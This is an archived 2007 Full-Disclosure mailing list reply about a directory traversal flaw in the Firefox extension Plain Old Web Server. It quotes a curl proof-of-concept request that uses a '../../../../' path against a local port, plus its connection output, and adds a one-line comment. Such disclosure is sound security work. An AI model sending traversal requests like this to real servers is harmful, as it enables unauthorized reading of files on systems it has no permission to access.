|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: [Full-disclosure] [WEB SECURITY] Plain Old Webserver - The coolest firefox extension
From: Matthew Flaschen (matthew.flaschen
gatech.edu)
Date: Fri Feb 23 2007 - 13:21:36 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Stefano Di Paola wrote:
> Plain Old Web Server
> Good Old Dir Traversal
>
> curl "127.0.0.1:6670/../../../../" -kivvv
> * About to connect() to 127.0.0.1 port 6670
> * Trying 127.0.0.1... connected
> * Connected to 127.0.0.1 (127.0.0.1) port 6670
>> GET /../../../../ HTTP/1.1
Yep, I think it's just a rite of passage for all web servers.
Matthew Flaschen
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
- application/pgp-signature attachment: OpenPGP digital signature
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]